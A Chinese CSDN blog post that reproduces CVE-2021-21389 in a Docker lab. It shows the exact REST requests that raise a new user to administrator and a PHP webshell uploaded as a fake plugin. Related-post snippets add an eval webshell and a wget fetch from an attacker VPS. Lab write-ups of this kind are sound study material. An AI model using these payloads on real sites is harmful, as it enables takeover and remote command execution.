WordPress BuddyPress 存在越权漏洞RCE(CVE-2021-21389)

最新推荐文章于 2024-07-15 22:20:25 发布
最新推荐文章于 2024-07-15 22:20:25 发布
阅读量3.5k 收藏 10
点赞数 2
文章标签: 安全 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaobai_20190815/article/details/124704353
版权
本文详细介绍了BuddyPress在5.0.0到7.2.1版本间的严重安全漏洞,非特权用户可通过RESTAPI获取管理员权限。通过docker环境复现了漏洞步骤,包括注册、绕过验证、提升权限及上传木马。建议用户更新到7.2.1版本以修复此问题。
摘要由CSDN通过智能技术生成

一、漏洞描述

BuddyPress 是一个用于构建社区站点的开源 WordPress 插件。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中,非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。该漏洞已在 BuddyPress 7.2.1 中修复。插件的现有安装应更新到此版本以缓解问题

二、影响版本

5.0.0 <BuddyPress< 7.2.1

三、漏洞环境

1、dockerhub拉镜像,docker pull hoangkien1020/buddypress:cve202121389

2、启动环境,docker run -p 80:80 -d hoangkien1020/buddypress:cve202121389

四、漏洞复现

1、构造发包:POST /wp-json/buddypress/v1/signup

{"user_login": "test1121", "user_email": "qxzkpzc@test.com", "user_name": "test1121", "password": "test1121"}

2、将注册时的activation_key取出来,构造发包PUT //wp-json/buddypress/v1/signup/activate/cPyemIPO4HhzOaPpJtA9oG1MUlxULeiM,以绕过邮箱验证

3、新建分组,填完Details后,然后settings默认点击下一步,然后重新进入groups,已经创建成功。

4、点开group1134进入manage下面的members,点击Ban,然后抓包,获取到有效的Cookie和X-WP-Nonce,然后构造发包POST /wp-json/buddypress/v1/members/me,替换掉里面的Cookie和X-WP-Nonce,然后获取administrator角色的权限

{"roles": "administrator"}

刷新页面后,我们已经获取到administrator角色的权限可以查看和操作所有模块,我们通过更新plugins,上传木马

选择文件时,选择所有文件,保险起见选择啦.png格式的小马(后测试发现可以直接上传.php文件),测试一下选择上传后,抓包修改,修改为.php模式,

Content-Disposition: form-data; name="pluginzip"; filename="c.php"

Content-Type: text/php

<?php

system($_GET[cmd]);

?>

上传成功后,status显示为200,但是显示不可更新,我们从/wp-content/uploads/2022/05/(上传的年月)路径下获取已经上传的木马文件,成功执行命令

五、更新建议

目前厂商已发布升级补丁以修复漏洞或直接更新到最新版本,补丁获取链接:

BuddyPress 7.2.1 Security Release · BuddyPress.org

whatever`
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
WordPress BuddyPress 越权RCE漏洞复现(CVE-2021-21389
0xSec
01-13 1690
BuddyPressWordPress母公司的一个全新的开源程序,BuddyPress 从本质上说其实是 WordPress 的插件。BuddyPressWordPress的关注点从博客转移到了社区。当然,用户还是能够使用WordPress的所有的博客功能,只是当用户使用 BuddyPress 时,第一要做的是创建他们个人档案,第二才是写博客。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中,非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。
WordPress Bricks Builder RCE(CVE-2024-25600)
qq_67810151的博客
02-23 1280
Bricks Builder 小于等于1.9.6的版本存在远程代码执行漏洞,攻击者可以通过该漏洞远程执行任意代码,控制服务器。
WordPress BuddyPress 越权漏洞RCECVE-2021-21389
最新发布
Biu_Biu_Bi的博客
07-15 1002
BuddyPress 是一个用于构建社区站点的开源 WordPress 插件。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中,非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。该漏洞已在 BuddyPress 7.2.1 中修复。插件的现有安装应更新到此版本以缓解问题。
CVE-2024-25600 WordPress Bricks Builder RCE-漏洞分析研究
shelter1234567的博客
03-06 2643
CVE-2024-25600 是一个严重的(CVSS 评分 9.8)远程代码执行 (RCE) 漏洞,影响 WordPress 的 Bricks Builder 插件。成功利用此漏洞可能允许未经身份验证的攻击者在受影响的基于 WordPress 的网站上远程执行任意 PHP 代码。据报道,该漏洞已被广泛利用,包括尝试在易受攻击的服务器上安装基于 PHP 的恶意 Webshell。Bricks Builder 插件版本 1.9.6.1 或更高版本中已发布解决此漏洞的补丁。Bricks Builder官方。
WordPress-RCE-EXP
04-10
WordPress-RCE-EXP 影响版本 漏洞编号:CVE-2016-10033 (基于) WordPress <= 4.7.1 PHPMailer < 5> <目标站存在的用户名> Python3 wp_rce_exp.py http://127.0.0.1/ admin 0x2漏洞利用 出现 Test_blind_shell>>> 后,说明网站存在RCE漏洞 有两种方式来漏洞利用 一、写入Webshell 1.在vps上开web服务,在web目录下的test.txt文件中写入一句话 <?php @eval($_POST[test]); ?> 2.目标使用wget下载到web目录上 (注意vps需要用ip地址,前面不能加http://) Test_blind_shell>>>/usr/bin/wget --
buddypress-last-active-users-wp-admin:在“wp-adminusers.php”页面上显示用户的 BuddyPress 上次活动日期
07-03
buddypress-last-active-users-wp-admin”是一个针对WordPress管理后台的插件,主要功能是在“wp-admin/users.php”页面上显示BuddyPress用户最近的活动日期。这有助于网站管理员快速了解哪些用户最近在社区中活跃...
buddypress-admin-edit-profile-link:从WordPress用户仪表板编辑BuddyPress用户配置文件
05-26
BuddyPress-用户个人资料编辑管理员链接 #### BuddyPress插件 一个非常简单,很小的WordPress BuddyPress插件,可在WordPress用户管理仪表板页面中列出的指向该用户BuddyPress配置文件编辑页面的每个用户旁边提供...
WordPress 主题: imperza | Responsive Multi-Purpose Theme v6.2 2019最新破解版
07-30
WordPress 主题: imperza | Responsive Multi-Purpose Theme v6.2 2019最新破解版 含插件、Demo资源
WordPress插件】2022年最新版完整功能demo+插件v2.0.3 - March 23, 2021.zip
04-13
"【WordPress插件】2022年最新版完整功能demo+插件v2.0.3 - March 23, 2021 WordPress, BuddyPress Users Chat Plugin WordPressBuddyPress用户聊天插件" ---------- 泰森云每天更新发布最新WordPress主题、HTML...
WordPress<=4.6 RCE(CVE-2016-10033)
jammny
10-24 613
前言 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 漏洞详情 wordpress使用phpmailer组件进行重置密码邮件的发送,但是phpmailer < 5.2.18之前的版本存在命令注入漏洞WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击
CVE-2021-21315v2
05-07
CVE-2021-21315系统信息 这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()的服务参数...仅允许使用字符串,拒绝任何数组。字符串清理如预期般运作。” 因为它并没有很好地解释漏洞(我认为),所以我决定根据系统信息的易受攻击的版本来编写小型应用程序。 PoC包含: 使用明确的易受攻击的系统信息测试Node.js中制作的应用 简单测试有效负载即可在受影响的计算机上创建.txt文件 重现步骤: 在Linux服务器环境上运行应用程序 向site.com/api/getServices?name=nginx发出GET请求(nginx只是示例) 现在尝试发送这样的请求:yours
CVE-2021-29447:WordPress-身份验证的XXE(CVE-2021-29447)
05-14
WordPress 5.6-5.7-经过身份验证的XXE(CVE-2021-29447) 使用 步骤1。 运行WordPress $ make up-wp 第2步。 运行Attacker Web服务器 $ make up-mal 第三步生成恶意的WAV文件 $ make make-wav 第四步。 登录WordPress并将WAV文件上传到新媒体 第五步解码 参考
WordPress--mailpress RCE复现
ro4lsc的博客
03-16 7866
本文主要讲述了WordPress--mailpress RCE漏洞的复现,如有纰漏,请联系笔者修改,希望能对您有所帮助。
wordpress 4.6 RCE漏洞利用(CVE-2016-10033)
xiaobai_20190815的博客
04-08 5383
一、漏洞描述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行 二、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 三、漏洞搭建 vulhub下载,傻瓜式安装,然后漏洞在密码重置这个页面 四、漏洞利用 1、抓包,构造POST /wp-login.p
WordPress Exploit-4-6 RCE CVE-2016-10033
公众号shadow sock7
05-07 1051
原文: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html绕过过滤器To exploit the PHPMailer’s mail() injection vulnerability, an attacker would have to be able to append param
漏洞复现-wordpress RCE-CVE-2024-25600(1),网络安全面试项目经验
m0_60666921的博客
04-07 1077
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发PHP开发、.NET、安卓逆向、云计算**④等保简介、等保规定、流程和规范。
漏洞复现-wordpress RCE-CVE-2024-25600
04-12 558
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
WordPress 4.7.0及4.7.1存在越权漏洞 官方已出补丁 站长们尽快备份后升级吧
weixin_34097242的博客
09-01 403
WordPress 4.7.0-4.7.1版本中,存在着一个越权漏洞,成功的利用这个漏洞,可以绕过管理员权限对文章进行增删改查操作。官方已经发布补丁,请广大站长朋友们尽快备份后升级。 WordPress 4.7.1越权漏洞 WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把...
WordPress+BuddyPress注册页面404问题的解决
06-28
WordPress 结合 BuddyPress 的环境中,遇到注册页面(通常指用户注册或登录页面)404问题可能是由以下几个原因引起的: 1. **URL结构错误**:确保 WordPress 主题中的注册 URL 指向了正确的 BuddyPress 插件文件。通常,这可能是 `bp-login.php` 或者自定义的登录模板。 2. **插件冲突**:有些插件可能会影响到 BuddyPress 的功能,检查是否有插件与 BuddyPress 或默认的 WordPress 登录功能不兼容。 3. **未激活插件或主题**:BuddyPress 需要与合适的 WordPress 主题和插件一起工作,确保它们都已正确激活。 4. **BuddyPress 设置**:在 wp-admin 中,前往 Users -> Settings -> Registration 页面,确认是否正确配置了用户注册设置,包括重定向和默认页面。 5. **代码问题**:如果使用了自定义代码或主题模板,可能存在误删、路径错误或代码冲突导致的404。 6. **服务器配置**:有时,服务器防火墙或.htaccess 文件设置可能阻止了对注册页面的访问,检查这些设置。 为了解决这个问题,你可以尝试以下步骤: 1. **检查URL**:确保 URL 没有错别字,使用浏览器开发者工具检查请求路径。 2. **更新插件和主题**:确保所有插件和主题都是最新版本。 3. **禁用/启用插件**:临时禁用除BuddyPress 和必要主题外的所有插件,看问题是否依然存在。 4. **复原设置**:如果使用过自定义配置,尝试还原到默认设置。 5. **查看日志**:查阅网站服务器日志,寻找关于404的详细信息。 6. **寻求专业帮助**:如果以上步骤都无法解决问题,可能需要联系开发者或寻求技术支持。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值